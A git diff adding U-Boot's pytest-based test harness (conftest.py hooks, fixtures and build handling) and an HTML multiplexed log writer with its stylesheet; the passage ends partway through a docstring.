diff options
Diffstat (limited to 'test/py')
155 files changed, 22191 insertions, 0 deletions
diff --git a/test/py/.gitignore b/test/py/.gitignore new file mode 100644 index 00000000000..0d20b6487c6 --- /dev/null +++ b/test/py/.gitignore @@ -0,0 +1 @@ +*.pyc diff --git a/test/py/conftest.py b/test/py/conftest.py new file mode 100644 index 00000000000..fc9dd3a83f8 --- /dev/null +++ b/test/py/conftest.py @@ -0,0 +1,688 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Implementation of pytest run-time hook functions. These are invoked by +# pytest at certain points during operation, e.g. startup, for each executed +# test, at shutdown etc. These hooks perform functions such as: +# - Parsing custom command-line options. +# - Pullilng in user-specified board configuration. +# - Creating the U-Boot console test fixture. +# - Creating the HTML log file. +# - Monitoring each test's results. +# - Implementing custom pytest markers. + +import atexit +import configparser +import errno +import filelock +import io +import os +import os.path +from pathlib import Path +import pytest +import re +from _pytest.runner import runtestprotocol +import sys + +# Globals: The HTML log file, and the connection to the U-Boot console. +log = None +console = None + +TEST_PY_DIR = os.path.dirname(os.path.abspath(__file__)) + +def mkdir_p(path): + """Create a directory path. + + This includes creating any intermediate/parent directories. Any errors + caused due to already extant directories are ignored. + + Args: + path: The directory path to create. + + Returns: + Nothing. + """ + + try: + os.makedirs(path) + except OSError as exc: + if exc.errno == errno.EEXIST and os.path.isdir(path): + pass + else: + raise + +def pytest_addoption(parser): + """pytest hook: Add custom command-line options to the cmdline parser. + + Args: + parser: The pytest command-line parser. + + Returns: + Nothing. + """ + + parser.addoption('--build-dir', default=None, + help='U-Boot build directory (O=)') + parser.addoption('--result-dir', default=None, + help='U-Boot test result/tmp directory') + parser.addoption('--persistent-data-dir', default=None, + help='U-Boot test persistent generated data directory') + parser.addoption('--board-type', '--bd', '-B', default='sandbox', + help='U-Boot board type') + parser.addoption('--board-identity', '--id', default='na', + help='U-Boot board identity/instance') + parser.addoption('--build', default=False, action='store_true', + help='Compile U-Boot before running tests') + parser.addoption('--buildman', default=False, action='store_true', + help='Use buildman to build U-Boot (assuming --build is given)') + parser.addoption('--gdbserver', default=None, + help='Run sandbox under gdbserver. The argument is the channel '+ + 'over which gdbserver should communicate, e.g. localhost:1234') + +def run_build(config, source_dir, build_dir, board_type, log): + """run_build: Build U-Boot + + Args: + config: The pytest configuration. + soruce_dir (str): Directory containing source code + build_dir (str): Directory to build in + board_type (str): board_type parameter (e.g. 'sandbox') + log (Logfile): Log file to use + """ + if config.getoption('buildman'): + if build_dir != source_dir: + dest_args = ['-o', build_dir, '-w'] + else: + dest_args = ['-i'] + cmds = (['buildman', '--board', board_type] + dest_args,) + name = 'buildman' + else: + if build_dir != source_dir: + o_opt = 'O=%s' % build_dir + else: + o_opt = '' + cmds = ( + ['make', o_opt, '-s', board_type + '_defconfig'], + ['make', o_opt, '-s', '-j{}'.format(os.cpu_count())], + ) + name = 'make' + + with log.section(name): + runner = log.get_runner(name, sys.stdout) + for cmd in cmds: + runner.run(cmd, cwd=source_dir) + runner.close() + log.status_pass('OK') + +def pytest_xdist_setupnodes(config, specs): + """Clear out any 'done' file from a previous build""" + global build_done_file + build_dir = config.getoption('build_dir') + board_type = config.getoption('board_type') + source_dir = os.path.dirname(os.path.dirname(TEST_PY_DIR)) + if not build_dir: + build_dir = source_dir + '/build-' + board_type + build_done_file = Path(build_dir) / 'build.done' + if build_done_file.exists(): + os.remove(build_done_file) + +def pytest_configure(config): + """pytest hook: Perform custom initialization at startup time. + + Args: + config: The pytest configuration. + + Returns: + Nothing. + """ + def parse_config(conf_file): + """Parse a config file, loading it into the ubconfig container + + Args: + conf_file: Filename to load (within build_dir) + + Raises + Exception if the file does not exist + """ + dot_config = build_dir + '/' + conf_file + if not os.path.exists(dot_config): + raise Exception(conf_file + ' does not exist; ' + + 'try passing --build option?') + + with open(dot_config, 'rt') as f: + ini_str = '[root]\n' + f.read() + ini_sio = io.StringIO(ini_str) + parser = configparser.RawConfigParser() + parser.read_file(ini_sio) + ubconfig.buildconfig.update(parser.items('root')) + + global log + global console + global ubconfig + + source_dir = os.path.dirname(os.path.dirname(TEST_PY_DIR)) + + board_type = config.getoption('board_type') + board_type_filename = board_type.replace('-', '_') + + board_identity = config.getoption('board_identity') + board_identity_filename = board_identity.replace('-', '_') + + build_dir = config.getoption('build_dir') + if not build_dir: + build_dir = source_dir + '/build-' + board_type + mkdir_p(build_dir) + + result_dir = config.getoption('result_dir') + if not result_dir: + result_dir = build_dir + mkdir_p(result_dir) + + persistent_data_dir = config.getoption('persistent_data_dir') + if not persistent_data_dir: + persistent_data_dir = build_dir + '/persistent-data' + mkdir_p(persistent_data_dir) + + gdbserver = config.getoption('gdbserver') + if gdbserver and not board_type.startswith('sandbox'): + raise Exception('--gdbserver only supported with sandbox targets') + + import multiplexed_log + log = multiplexed_log.Logfile(result_dir + '/test-log.html') + + if config.getoption('build'): + worker_id = os.environ.get("PYTEST_XDIST_WORKER") + with filelock.FileLock(os.path.join(build_dir, 'build.lock')): + build_done_file = Path(build_dir) / 'build.done' + if (not worker_id or worker_id == 'master' or + not build_done_file.exists()): + run_build(config, source_dir, build_dir, board_type, log) + build_done_file.touch() + + class ArbitraryAttributeContainer(object): + pass + + ubconfig = ArbitraryAttributeContainer() + ubconfig.brd = dict() + ubconfig.env = dict() + + modules = [ + (ubconfig.brd, 'u_boot_board_' + board_type_filename), + (ubconfig.env, 'u_boot_boardenv_' + board_type_filename), + (ubconfig.env, 'u_boot_boardenv_' + board_type_filename + '_' + + board_identity_filename), + ] + for (dict_to_fill, module_name) in modules: + try: + module = __import__(module_name) + except ImportError: + continue + dict_to_fill.update(module.__dict__) + + ubconfig.buildconfig = dict() + + # buildman -k puts autoconf.mk in the rootdir, so handle this as well + # as the standard U-Boot build which leaves it in include/autoconf.mk + parse_config('.config') + if os.path.exists(build_dir + '/' + 'autoconf.mk'): + parse_config('autoconf.mk') + else: + parse_config('include/autoconf.mk') + + ubconfig.test_py_dir = TEST_PY_DIR + ubconfig.source_dir = source_dir + ubconfig.build_dir = build_dir + ubconfig.result_dir = result_dir + ubconfig.persistent_data_dir = persistent_data_dir + ubconfig.board_type = board_type + ubconfig.board_identity = board_identity + ubconfig.gdbserver = gdbserver + ubconfig.dtb = build_dir + '/arch/sandbox/dts/test.dtb' + + env_vars = ( + 'board_type', + 'board_identity', + 'source_dir', + 'test_py_dir', + 'build_dir', + 'result_dir', + 'persistent_data_dir', + ) + for v in env_vars: + os.environ['U_BOOT_' + v.upper()] = getattr(ubconfig, v) + + if board_type.startswith('sandbox'): + import u_boot_console_sandbox + console = u_boot_console_sandbox.ConsoleSandbox(log, ubconfig) + else: + import u_boot_console_exec_attach + console = u_boot_console_exec_attach.ConsoleExecAttach(log, ubconfig) + +re_ut_test_list = re.compile(r'[^a-zA-Z0-9_]_u_boot_list_2_ut_(.*)_test_2_(.*)\s*$') +def generate_ut_subtest(metafunc, fixture_name, sym_path): + """Provide parametrization for a ut_subtest fixture. + + Determines the set of unit tests built into a U-Boot binary by parsing the + list of symbols generated by the build process. Provides this information + to test functions by parameterizing their ut_subtest fixture parameter. + + Args: + metafunc: The pytest test function. + fixture_name: The fixture name to test. + sym_path: Relative path to the symbol file with preceding '/' + (e.g. '/u-boot.sym') + + Returns: + Nothing. + """ + fn = console.config.build_dir + sym_path + try: + with open(fn, 'rt') as f: + lines = f.readlines() + except: + lines = [] + lines.sort() + + vals = [] + for l in lines: + m = re_ut_test_list.search(l) + if not m: + continue + suite, name = m.groups() + + # Tests marked with _norun should only be run manually using 'ut -f' + if name.endswith('_norun'): + continue + + vals.append(f'{suite} {name}') + + ids = ['ut_' + s.replace(' ', '_') for s in vals] + metafunc.parametrize(fixture_name, vals, ids=ids) + +def generate_config(metafunc, fixture_name): + """Provide parametrization for {env,brd}__ fixtures. + + If a test function takes parameter(s) (fixture names) of the form brd__xxx + or env__xxx, the brd and env configuration dictionaries are consulted to + find the list of values to use for those parameters, and the test is + parametrized so that it runs once for each combination of values. + + Args: + metafunc: The pytest test function. + fixture_name: The fixture name to test. + + Returns: + Nothing. + """ + + subconfigs = { + 'brd': console.config.brd, + 'env': console.config.env, + } + parts = fixture_name.split('__') + if len(parts) < 2: + return + if parts[0] not in subconfigs: + return + subconfig = subconfigs[parts[0]] + vals = [] + val = subconfig.get(fixture_name, []) + # If that exact name is a key in the data source: + if val: + # ... use the dict value as a single parameter value. + vals = (val, ) + else: + # ... otherwise, see if there's a key that contains a list of + # values to use instead. + vals = subconfig.get(fixture_name+ 's', []) + def fixture_id(index, val): + try: + return val['fixture_id'] + except: + return fixture_name + str(index) + ids = [fixture_id(index, val) for (index, val) in enumerate(vals)] + metafunc.parametrize(fixture_name, vals, ids=ids) + +def pytest_generate_tests(metafunc): + """pytest hook: parameterize test functions based on custom rules. + + Check each test function parameter (fixture name) to see if it is one of + our custom names, and if so, provide the correct parametrization for that + parameter. + + Args: + metafunc: The pytest test function. + + Returns: + Nothing. + """ + for fn in metafunc.fixturenames: + if fn == 'ut_subtest': + generate_ut_subtest(metafunc, fn, '/u-boot.sym') + continue + m_subtest = re.match('ut_(.)pl_subtest', fn) + if m_subtest: + spl_name = m_subtest.group(1) + generate_ut_subtest( + metafunc, fn, f'/{spl_name}pl/u-boot-{spl_name}pl.sym') + continue + generate_config(metafunc, fn) + +@pytest.fixture(scope='session') +def u_boot_log(request): + """Generate the value of a test's log fixture. + + Args: + request: The pytest request. + + Returns: + The fixture value. + """ + + return console.log + +@pytest.fixture(scope='session') +def u_boot_config(request): + """Generate the value of a test's u_boot_config fixture. + + Args: + request: The pytest request. + + Returns: + The fixture value. + """ + + return console.config + +@pytest.fixture(scope='function') +def u_boot_console(request): + """Generate the value of a test's u_boot_console fixture. + + Args: + request: The pytest request. + + Returns: + The fixture value. + """ + + console.ensure_spawned() + return console + +anchors = {} +tests_not_run = [] +tests_failed = [] +tests_xpassed = [] +tests_xfailed = [] +tests_skipped = [] +tests_warning = [] +tests_passed = [] + +def pytest_itemcollected(item): + """pytest hook: Called once for each test found during collection. + + This enables our custom result analysis code to see the list of all tests + that should eventually be run. + + Args: + item: The item that was collected. + + Returns: + Nothing. + """ + + tests_not_run.append(item.name) + +def cleanup(): + """Clean up all global state. + + Executed (via atexit) once the entire test process is complete. This + includes logging the status of all tests, and the identity of any failed + or skipped tests. + + Args: + None. + + Returns: + Nothing. + """ + + if console: + console.close() + if log: + with log.section('Status Report', 'status_report'): + log.status_pass('%d passed' % len(tests_passed)) + if tests_warning: + log.status_warning('%d passed with warning' % len(tests_warning)) + for test in tests_warning: + anchor = anchors.get(test, None) + log.status_warning('... ' + test, anchor) + if tests_skipped: + log.status_skipped('%d skipped' % len(tests_skipped)) + for test in tests_skipped: + anchor = anchors.get(test, None) + log.status_skipped('... ' + test, anchor) + if tests_xpassed: + log.status_xpass('%d xpass' % len(tests_xpassed)) + for test in tests_xpassed: + anchor = anchors.get(test, None) + log.status_xpass('... ' + test, anchor) + if tests_xfailed: + log.status_xfail('%d xfail' % len(tests_xfailed)) + for test in tests_xfailed: + anchor = anchors.get(test, None) + log.status_xfail('... ' + test, anchor) + if tests_failed: + log.status_fail('%d failed' % len(tests_failed)) + for test in tests_failed: + anchor = anchors.get(test, None) + log.status_fail('... ' + test, anchor) + if tests_not_run: + log.status_fail('%d not run' % len(tests_not_run)) + for test in tests_not_run: + anchor = anchors.get(test, None) + log.status_fail('... ' + test, anchor) + log.close() +atexit.register(cleanup) + +def setup_boardspec(item): + """Process any 'boardspec' marker for a test. + + Such a marker lists the set of board types that a test does/doesn't + support. If tests are being executed on an unsupported board, the test is + marked to be skipped. + + Args: + item: The pytest test item. + + Returns: + Nothing. + """ + + required_boards = [] + for boards in item.iter_markers('boardspec'): + board = boards.args[0] + if board.startswith('!'): + if ubconfig.board_type == board[1:]: + pytest.skip('board "%s" not supported' % ubconfig.board_type) + return + else: + required_boards.append(board) + if required_boards and ubconfig.board_type not in required_boards: + pytest.skip('board "%s" not supported' % ubconfig.board_type) + +def setup_buildconfigspec(item): + """Process any 'buildconfigspec' marker for a test. + + Such a marker lists some U-Boot configuration feature that the test + requires. If tests are being executed on an U-Boot build that doesn't + have the required feature, the test is marked to be skipped. + + Args: + item: The pytest test item. + + Returns: + Nothing. + """ + + for options in item.iter_markers('buildconfigspec'): + option = options.args[0] + if not ubconfig.buildconfig.get('config_' + option.lower(), None): + pytest.skip('.config feature "%s" not enabled' % option.lower()) + for options in item.iter_markers('notbuildconfigspec'): + option = options.args[0] + if ubconfig.buildconfig.get('config_' + option.lower(), None): + pytest.skip('.config feature "%s" enabled' % option.lower()) + +def tool_is_in_path(tool): + for path in os.environ["PATH"].split(os.pathsep): + fn = os.path.join(path, tool) + if os.path.isfile(fn) and os.access(fn, os.X_OK): + return True + return False + +def setup_requiredtool(item): + """Process any 'requiredtool' marker for a test. + + Such a marker lists some external tool (binary, executable, application) + that the test requires. If tests are being executed on a system that + doesn't have the required tool, the test is marked to be skipped. + + Args: + item: The pytest test item. + + Returns: + Nothing. + """ + + for tools in item.iter_markers('requiredtool'): + tool = tools.args[0] + if not tool_is_in_path(tool): + pytest.skip('tool "%s" not in $PATH' % tool) + +def setup_singlethread(item): + """Process any 'singlethread' marker for a test. + + Skip this test if running in parallel. + + Args: + item: The pytest test item. + + Returns: + Nothing. + """ + for single in item.iter_markers('singlethread'): + worker_id = os.environ.get("PYTEST_XDIST_WORKER") + if worker_id and worker_id != 'master': + pytest.skip('must run single-threaded') + +def start_test_section(item): + anchors[item.name] = log.start_section(item.name) + +def pytest_runtest_setup(item): + """pytest hook: Configure (set up) a test item. + + Called once for each test to perform any custom configuration. This hook + is used to skip the test if certain conditions apply. + + Args: + item: The pytest test item. + + Returns: + Nothing. + """ + + start_test_section(item) + setup_boardspec(item) + setup_buildconfigspec(item) + setup_requiredtool(item) + setup_singlethread(item) + +def pytest_runtest_protocol(item, nextitem): + """pytest hook: Called to execute a test. + + This hook wraps the standard pytest runtestprotocol() function in order + to acquire visibility into, and record, each test function's result. + + Args: + item: The pytest test item to execute. + nextitem: The pytest test item that will be executed after this one. + + Returns: + A list of pytest reports (test result data). + """ + + log.get_and_reset_warning() + ihook = item.ihook + ihook.pytest_runtest_logstart(nodeid=item.nodeid, location=item.location) + reports = runtestprotocol(item, nextitem=nextitem) + ihook.pytest_runtest_logfinish(nodeid=item.nodeid, location=item.location) + was_warning = log.get_and_reset_warning() + + # In pytest 3, runtestprotocol() may not call pytest_runtest_setup() if + # the test is skipped. That call is required to create the test's section + # in the log file. The call to log.end_section() requires that the log + # contain a section for this test. Create a section for the test if it + # doesn't already exist. + if not item.name in anchors: + start_test_section(item) + + failure_cleanup = False + if not was_warning: + test_list = tests_passed + msg = 'OK' + msg_log = log.status_pass + else: + test_list = tests_warning + msg = 'OK (with warning)' + msg_log = log.status_warning + for report in reports: + if report.outcome == 'failed': + if hasattr(report, 'wasxfail'): + test_list = tests_xpassed + msg = 'XPASSED' + msg_log = log.status_xpass + else: + failure_cleanup = True + test_list = tests_failed + msg = 'FAILED:\n' + str(report.longrepr) + msg_log = log.status_fail + break + if report.outcome == 'skipped': + if hasattr(report, 'wasxfail'): + failure_cleanup = True + test_list = tests_xfailed + msg = 'XFAILED:\n' + str(report.longrepr) + msg_log = log.status_xfail + break + test_list = tests_skipped + msg = 'SKIPPED:\n' + str(report.longrepr) + msg_log = log.status_skipped + + if failure_cleanup: + console.drain_console() + + test_list.append(item.name) + tests_not_run.remove(item.name) + + try: + msg_log(msg) + except: + # If something went wrong with logging, it's better to let the test + # process continue, which may report other exceptions that triggered + # the logging issue (e.g. console.log wasn't created). Hence, just + # squash the exception. If the test setup failed due to e.g. syntax + # error somewhere else, this won't be seen. However, once that issue + # is fixed, if this exception still exists, it will then be logged as + # part of the test's stdout. + import traceback + print('Exception occurred while logging runtest status:') + traceback.print_exc() + # FIXME: Can we force a test failure here? + + log.end_section(item.name) + + if failure_cleanup: + console.cleanup_spawn() + + return True diff --git a/test/py/multiplexed_log.css b/test/py/multiplexed_log.css new file mode 100644 index 00000000000..3db99272235 --- /dev/null +++ b/test/py/multiplexed_log.css @@ -0,0 +1,108 @@ +/* SPDX-License-Identifier: GPL-2.0 */ +/* + * Copyright (c) 2015 Stephen Warren + * Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + */ + +/* + * This provides pretty formatting of the HTML log file, e.g. + * - colored bars beside/above log sections for easily parsed delineation. + * - color highlighting of various messages. + */ + +body { + background-color: black; + color: #ffffff; +} + +pre { + margin-top: 0px; + margin-bottom: 0px; +} + +.implicit { + color: #808080; +} + +.block { + border-style: solid; + border-color: #303030; + border-width: 0px 0px 0px 5px; + padding-left: 5px +} + +.block-header { + background-color: #303030; + margin-left: -5px; + margin-top: 5px; +} + +.block-header:hover { + text-decoration: underline; +} + +.block-trailer { + display: none; +} + +.error { + color: #ff0000 +} + +.warning { + color: #ffff00 +} + +.info { + color: #808080 +} + +.action { + color: #8080ff +} + +.timestamp { + color: #8080ff +} + +.status-pass { + color: #00ff00 +} + +.status-warning { + color: #ffff00 +} + +.status-skipped { + color: #ffff00 +} + +.status-xfail { + color: #ff7f00 +} + +.status-xpass { + color: #ff7f00 +} + +.status-fail { + color: #ff0000 +} + +.hidden { + display: none; +} + +a:link { + text-decoration: inherit; + color: inherit; +} + +a:visited { + text-decoration: inherit; + color: inherit; +} + +a:hover { + text-decoration: underline; +} diff --git a/test/py/multiplexed_log.py b/test/py/multiplexed_log.py new file mode 100644 index 00000000000..63237594bb4 --- /dev/null +++ b/test/py/multiplexed_log.py @@ -0,0 +1,714 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Generate an HTML-formatted log file containing multiple streams of data, +each represented in a well-delineated/-structured fashion. +""" + +import datetime +import html +import os.path +import shutil +import subprocess + +mod_dir = os.path.dirname(os.path.abspath(__file__)) + +class LogfileStream(object): + """A file-like object used to write a single logical stream of data into + a multiplexed log file. Objects of this type should be created by factory + functions in the Logfile class rather than directly.""" + + def __init__(self, logfile, name, chained_file): + """Initialize a new object. + + Args: + logfile: The Logfile object to log to. + name: The name of this log stream. + chained_file: The file-like object to which all stream data should be + logged to in addition to logfile. Can be None. + + Returns: + Nothing. + """ + + self.logfile = logfile + self.name = name + self.chained_file = chained_file + + def close(self): + """Dummy function so that this class is "file-like". + + Args: + None. + + Returns: + Nothing. + """ + + pass + + def write(self, data, implicit=False): + """Write data to the log stream. + + Args: + data: The data to write to the file. + implicit: Boolean indicating whether data actually appeared in the + stream, or was implicitly generated. A valid use-case is to + repeat a shell prompt at the start of each separate log + section, which makes the log sections more readable in + isolation. + + Returns: + Nothing. + """ + + self.logfile.write(self, data, implicit) + if self.chained_file: + # Chained file is console, convert things a little + self.chained_file.write((data.encode('ascii', 'replace')).decode()) + + def flush(self): + """Flush the log stream, to ensure correct log interleaving. + + Args: + None. + + Returns: + Nothing. + """ + + self.logfile.flush() + if self.chained_file: + self.chained_file.flush() + +class RunAndLog(object): + """A utility object used to execute sub-processes and log their output to + a multiplexed log file. Objects of this type should be created by factory + functions in the Logfile class rather than directly.""" + + def __init__(self, logfile, name, chained_file): + """Initialize a new object. + + Args: + logfile: The Logfile object to log to. + name: The name of this log stream or sub-process. + chained_file: The file-like object to which all stream data should + be logged to in addition to logfile. Can be None. + + Returns: + Nothing. + """ + + self.logfile = logfile + self.name = name + self.chained_file = chained_file + self.output = None + self.exit_status = None + + def close(self): + """Clean up any resources managed by this object.""" + pass + + def run(self, cmd, cwd=None, ignore_errors=False, stdin=None, env=None): + """Run a command as a sub-process, and log the results. + + The output is available at self.output which can be useful if there is + an exception. + + Args: + cmd: The command to execute. + cwd: The directory to run the command in. Can be None to use the + current directory. + ignore_errors: Indicate whether to ignore errors. If True, the + function will simply return if the command cannot be executed + or exits with an error code, otherwise an exception will be + raised if such problems occur. + stdin: Input string to pass to the command as stdin (or None) + env: Environment to use, or None to use the current one + + Returns: + The output as a string. + """ + + msg = '+' + ' '.join(cmd) + '\n' + if self.chained_file: + self.chained_file.write(msg) + self.logfile.write(self, msg) + + try: + p = subprocess.Popen(cmd, cwd=cwd, + stdin=subprocess.PIPE if stdin else None, + stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env) + (stdout, stderr) = p.communicate(input=stdin) + if stdout is not None: + stdout = stdout.decode('utf-8') + if stderr is not None: + stderr = stderr.decode('utf-8') + output = '' + if stdout: + if stderr: + output += 'stdout:\n' + output += stdout + if stderr: + if stdout: + output += 'stderr:\n' + output += stderr + exit_status = p.returncode + exception = None + except subprocess.CalledProcessError as cpe: + output = cpe.output + exit_status = cpe.returncode + exception = cpe + except Exception as e: + output = '' + exit_status = 0 + exception = e + if output and not output.endswith('\n'): + output += '\n' + if exit_status and not exception and not ignore_errors: + exception = ValueError('Exit code: ' + str(exit_status)) + if exception: + output += str(exception) + '\n' + self.logfile.write(self, output) + if self.chained_file: + self.chained_file.write(output) + self.logfile.timestamp() + + # Store the output so it can be accessed if we raise an exception. + self.output = output + self.exit_status = exit_status + if exception: + raise exception + return output + +class SectionCtxMgr: + """A context manager for Python's "with" statement, which allows a certain + portion of test code to be logged to a separate section of the log file. + Objects of this type should be created by factory functions in the Logfile + class rather than directly.""" + + def __init__(self, log, marker, anchor): + """Initialize a new object. + + Args: + log: The Logfile object to log to. + marker: The name of the nested log section. + anchor: The anchor value to pass to start_section(). + + Returns: + Nothing. + """ + + self.log = log + self.marker = marker + self.anchor = anchor + + def __enter__(self): + self.anchor = self.log.start_section(self.marker, self.anchor) + + def __exit__(self, extype, value, traceback): + self.log.end_section(self.marker) + +class Logfile: + """Generates an HTML-formatted log file containing multiple streams of + data, each represented in a well-delineated/-structured fashion.""" + + def __init__(self, fn): + """Initialize a new object. + + Args: + fn: The filename to write to. + + Returns: + Nothing. + """ + + self.f = open(fn, 'wt', encoding='utf-8') + self.last_stream = None + self.blocks = [] + self.cur_evt = 1 + self.anchor = 0 + self.timestamp_start = self._get_time() + self.timestamp_prev = self.timestamp_start + self.timestamp_blocks = [] + self.seen_warning = False + + shutil.copy(mod_dir + '/multiplexed_log.css', os.path.dirname(fn)) + self.f.write('''\ +<html> +<head> +<link rel="stylesheet" type="text/css" href="multiplexed_log.css"> +<script src="http://code.jquery.com/jquery.min.js"></script> +<script> +$(document).ready(function () { + // Copy status report HTML to start of log for easy access + sts = $(".block#status_report")[0].outerHTML; + $("tt").prepend(sts); + + // Add expand/contract buttons to all block headers + btns = "<span class=\\\"block-expand hidden\\\">[+] </span>" + + "<span class=\\\"block-contract\\\">[-] </span>"; + $(".block-header").prepend(btns); + + // Pre-contract all blocks which passed, leaving only problem cases + // expanded, to highlight issues the user should look at. + // Only top-level blocks (sections) should have any status + passed_bcs = $(".block-content:has(.status-pass)"); + // Some blocks might have multiple status entries (e.g. the status + // report), so take care not to hide blocks with partial success. + passed_bcs = passed_bcs.not(":has(.status-fail)"); + passed_bcs = passed_bcs.not(":has(.status-xfail)"); + passed_bcs = passed_bcs.not(":has(.status-xpass)"); + passed_bcs = passed_bcs.not(":has(.status-skipped)"); + passed_bcs = passed_bcs.not(":has(.status-warning)"); + // Hide the passed blocks + passed_bcs.addClass("hidden"); + // Flip the expand/contract button hiding for those blocks. + bhs = passed_bcs.parent().children(".block-header") + bhs.children(".block-expand").removeClass("hidden"); + bhs.children(".block-contract").addClass("hidden"); + + // Add click handler to block headers. + // The handler expands/contracts the block. + $(".block-header").on("click", function (e) { + var header = $(this); + var content = header.next(".block-content"); + var expanded = !content.hasClass("hidden"); + if (expanded) { + content.addClass("hidden"); + header.children(".block-expand").first().removeClass("hidden"); + header.children(".block-contract").first().addClass("hidden"); + } else { + header.children(".block-contract").first().removeClass("hidden"); + header.children(".block-expand").first().addClass("hidden"); + content.removeClass("hidden"); + } + }); + + // When clicking on a link, expand the target block + $("a").on("click", function (e) { + var block = $($(this).attr("href")); + var header = block.children(".block-header"); + var content = block.children(".block-content").first(); + header.children(".block-contract").first().removeClass("hidden"); + header.children(".block-expand").first().addClass("hidden"); + content.removeClass("hidden"); + }); +}); +</script> +</head> +<body> +<tt> +''') + + def close(self): + """Close the log file. + + After calling this function, no more data may be written to the log. + + Args: + None. + + Returns: + Nothing. + """ + + self.f.write('''\ +</tt> +</body> +</html> +''') + self.f.close() + + # The set of characters that should be represented as hexadecimal codes in + # the log file. + _nonprint = {ord('%')} + _nonprint.update(c for c in range(0, 32) if c not in (9, 10)) + _nonprint.update(range(127, 256)) + + def _escape(self, data): + """Render data format suitable for inclusion in an HTML document. + + This includes HTML-escaping certain characters, and translating + control characters to a hexadecimal representation. + + Args: + data: The raw string data to be escaped. + + Returns: + An escaped version of the data. + """ + + data = data.replace(chr(13), '') + data = ''.join((ord(c) in self._nonprint) and ('%%%02x' % ord(c)) or + c for c in data) + data = html.escape(data) + return data + + def _terminate_stream(self): + """Write HTML to the log file to terminate the current stream's data. + + Args: + None. + + Returns: + Nothing. + """ + + self.cur_evt += 1 + if not self.last_stream: + return + self.f.write('</pre>\n') + self.f.write('<div class="stream-trailer block-trailer">End stream: ' + + self.last_stream.name + '</div>\n') + self.f.write('</div>\n') + self.f.write('</div>\n') + self.last_stream = None + + def _note(self, note_type, msg, anchor=None): + """Write a note or one-off message to the log file. + + Args: + note_type: The type of note. This must be a value supported by the + accompanying multiplexed_log.css. + msg: The note/message to log. + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._terminate_stream() + self.f.write('<div class="' + note_type + '">\n') + self.f.write('<pre>') + if anchor: + self.f.write('<a href="#%s">' % anchor) + self.f.write(self._escape(msg)) + if anchor: + self.f.write('</a>') + self.f.write('\n</pre>\n') + self.f.write('</div>\n') + + def start_section(self, marker, anchor=None): + """Begin a new nested section in the log file. + + Args: + marker: The name of the section that is starting. + anchor: The value to use for the anchor. If None, a unique value + will be calculated and used + + Returns: + Name of the HTML anchor emitted before section. + """ + + self._terminate_stream() + self.blocks.append(marker) + self.timestamp_blocks.append(self._get_time()) + if not anchor: + self.anchor += 1 + anchor = str(self.anchor) + blk_path = '/'.join(self.blocks) + self.f.write('<div class="section block" id="' + anchor + '">\n') + self.f.write('<div class="section-header block-header">Section: ' + + blk_path + '</div>\n') + self.f.write('<div class="section-content block-content">\n') + self.timestamp() + + return anchor + + def end_section(self, marker): + """Terminate the current nested section in the log file. + + This function validates proper nesting of start_section() and + end_section() calls. If a mismatch is found, an exception is raised. + + Args: + marker: The name of the section that is ending. + + Returns: + Nothing. + """ + + if (not self.blocks) or (marker != self.blocks[-1]): + raise Exception('Block nesting mismatch: "%s" "%s"' % + (marker, '/'.join(self.blocks))) + self._terminate_stream() + timestamp_now = self._get_time() + timestamp_section_start = self.timestamp_blocks.pop() + delta_section = timestamp_now - timestamp_section_start + self._note("timestamp", + "TIME: SINCE-SECTION: " + str(delta_section)) + blk_path = '/'.join(self.blocks) + self.f.write('<div class="section-trailer block-trailer">' + + 'End section: ' + blk_path + '</div>\n') + self.f.write('</div>\n') + self.f.write('</div>\n') + self.blocks.pop() + + def section(self, marker, anchor=None): + """Create a temporary section in the log file. + + This function creates a context manager for Python's "with" statement, + which allows a certain portion of test code to be logged to a separate + section of the log file. + + Usage: + with log.section("somename"): + some test code + + Args: + marker: The name of the nested section. + anchor: The anchor value to pass to start_section(). + + Returns: + A context manager object. + """ + + return SectionCtxMgr(self, marker, anchor) + + def error(self, msg): + """Write an error note to the log file. + + Args: + msg: A message describing the error. + + Returns: + Nothing. + """ + + self._note("error", msg) + + def warning(self, msg): + """Write an warning note to the log file. + + Args: + msg: A message describing the warning. + + Returns: + Nothing. + """ + + self.seen_warning = True + self._note("warning", msg) + + def get_and_reset_warning(self): + """Get and reset the log warning flag. + + Args: + None + + Returns: + Whether a warning was seen since the last call. + """ + + ret = self.seen_warning + self.seen_warning = False + return ret + + def info(self, msg): + """Write an informational note to the log file. + + Args: + msg: An informational message. + + Returns: + Nothing. + """ + + self._note("info", msg) + + def action(self, msg): + """Write an action note to the log file. + + Args: + msg: A message describing the action that is being logged. + + Returns: + Nothing. + """ + + self._note("action", msg) + + def _get_time(self): + return datetime.datetime.now() + + def timestamp(self): + """Write a timestamp to the log file. + + Args: + None + + Returns: + Nothing. + """ + + timestamp_now = self._get_time() + delta_prev = timestamp_now - self.timestamp_prev + delta_start = timestamp_now - self.timestamp_start + self.timestamp_prev = timestamp_now + + self._note("timestamp", + "TIME: NOW: " + timestamp_now.strftime("%Y/%m/%d %H:%M:%S.%f")) + self._note("timestamp", + "TIME: SINCE-PREV: " + str(delta_prev)) + self._note("timestamp", + "TIME: SINCE-START: " + str(delta_start)) + + def status_pass(self, msg, anchor=None): + """Write a note to the log file describing test(s) which passed. + + Args: + msg: A message describing the passed test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-pass", msg, anchor) + + def status_warning(self, msg, anchor=None): + """Write a note to the log file describing test(s) which passed. + + Args: + msg: A message describing the passed test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-warning", msg, anchor) + + def status_skipped(self, msg, anchor=None): + """Write a note to the log file describing skipped test(s). + + Args: + msg: A message describing the skipped test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-skipped", msg, anchor) + + def status_xfail(self, msg, anchor=None): + """Write a note to the log file describing xfailed test(s). + + Args: + msg: A message describing the xfailed test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-xfail", msg, anchor) + + def status_xpass(self, msg, anchor=None): + """Write a note to the log file describing xpassed test(s). + + Args: + 